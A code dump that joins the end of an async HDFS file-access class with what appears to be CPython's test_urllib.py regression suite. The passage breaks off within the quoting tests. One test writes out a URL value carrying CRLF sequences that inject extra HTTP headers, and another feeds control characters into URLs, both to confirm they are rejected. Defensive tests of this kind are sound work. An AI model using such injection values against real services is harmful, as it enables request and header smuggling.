with self.__connect().write(self.path, overwrite=overwrite) as writer:
writer.write(content)
@_wrap_error
async def ls(self, recursive: bool = False) -> List[URL]:
""" Get the list of files in this directory, if it is one
Returns a list of URL objects. Results are always absolute.
*DO NOT `root.join(file)`*
"""
conn = self.__connect()
try:
if recursive:
return [self] + [
URL.to(f"hdfs://{self.host}{root}/{kid_path}")
async for root, dirs, files in conn.walk(self.path)
for kid_path in dirs + files
]
else:
# Not recursive
return [self.join(kid_path) for kid_path in conn.list(self.path)]
except hdfs.util.HdfsError as err:
if "not a directory" in err.message:
return [self]
else:
raise err
@_wrap_error
async def stat(self) -> Stat:
""" Get basic stat results for this file """
# The JSON looks like
# {
# 'accessTime': 1587745709481,
# 'blockSize': 268435456,
# 'childrenNum': 0,
# 'fileId': 1917677923,
# 'group': 'hdfs',
# 'length': 147603,
# 'modificationTime': 1587745709673,
# 'owner': 's0998yh0',
# 'pathSuffix': '',
# 'permission': '640',
# 'replication': 3,
# 'storagePolicy': 0,
# 'type': 'FILE'
# }
stat = self.__connect().status(self.path)
return Stat(
self,
kind=stat["type"].lower(),
size=stat["length"],
mtime=stat["modificationTime"] / 1000,
atime=stat["accessTime"] / 1000,
unix_permissions=int(stat["permission"], 8)
)
@_wrap_error
async def mkdir(self, ignore_if_exists: bool = False):
""" Create an empty directory and parent directories recursively
Accepts
-------
ignore_if_exists: boolean: DEPRECATED
Included for backward compatibility. Existing directories are always ignored.
"""
self.__connect().makedirs(self.path)
def supports_permissions(self) -> bool:
""" Some implementations, like blobs, do not always support permissions,
If this method returns true, the file system supports permissions
"""
return True
@_wrap_error
async def chmod(self, mode: int):
""" Modify permissions of the file so it has the desired mode """
self.__connect().set_permission(self.path, oct(mode)[2:])
@_wrap_error
async def unlink(self, ignore_if_missing: bool = False):
""" A lower-level method for removing one file or directory, to be overridden by specific
URL implementations. The recursive rm may or may not be built on this.
"""
self.__connect().delete(self.path)
@_wrap_error
async def rm(self, recursive: bool = True, ignore_if_missing: bool = False):
""" Delete a file or directory from HDFS.
Recursive deletes are faster than using unlink() repeatedly.
"""
self.__connect().delete(self.path, recursive=recursive)
async def read_stream(self):
""" Yield bytes from a file in whatever blocks are convenient for the filesystem.
Notes
-----
The implementation is free to read the whole file if necessary -
some systems cannot work any other way.
"""
with self.__connect().read(self.path) as reader:
yield reader.read(1 << 20)
async def write_stream(self, gen):
""" Fill a file from a generator of bytes objects
Notes
-----
The implementation is free to write the whole file if necessary -
some systems cannot work any other way.
"""
with self.__connect().write(self.path) as writer:
async for chunk in gen:
writer.write(chunk)
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata, mock_close=False):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
if mock_close:
# bpo-36918: HTTPConnection destructor calls close() which calls
# flush(). Problem: flush() calls self.fp.flush() which raises
# "ValueError: I/O operation on closed file" which is logged as an
# "Exception ignored in". Override close() to silence this error.
def close(self):
pass
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata, mock_close=False):
fake_http_class = fakehttp(fakedata, mock_close=mock_close)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fake_http_class
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = f"//localhost:7777/test{char}/"
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, f"contain control.*{escaped_char_repr}"):
urllib.request.urlopen(f"http:{schemeless_url}")
with self.assertRaisesRegex(
InvalidURL, f"contain control.*{escaped_char_repr}"):
urllib.request.urlopen(f"https:{schemeless_url}")
# This code path quotes the URL so there is no injection.
resp = urlopen(f"http:{schemeless_url}")
self.assertNotIn(char, resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r.*(found at least . .)"):
urllib.request.urlopen(f"http:{schemeless_url}")
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urllib.request.urlopen(f"https:{schemeless_url}")
# This code path quotes the URL so there is no injection.
resp = urlopen(f"http:{schemeless_url}")
self.assertNotIn(' ', resp.geturl())
self.assertNotIn('\r', resp.geturl())
self.assertNotIn('\n', resp.geturl())
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''', mock_close=True)
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''', mock_close=True)
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''', mock_close=True)
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with support.check_warnings(('', DeprecationWarning)):
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# clear _opener global variable
self.addCleanup(urllib.request.urlcleanup)
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# clear _opener global variable
self.addCleanup(urllib.request.urlcleanup)
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.addCleanup(urllib.request.urlcleanup)
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve(support.TEST_HTTP_URL,
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.addCleanup(urllib.request.urlcleanup)
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve(support.TEST_HTTP_URL)
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
r"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 3986 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-~"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append(r'<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
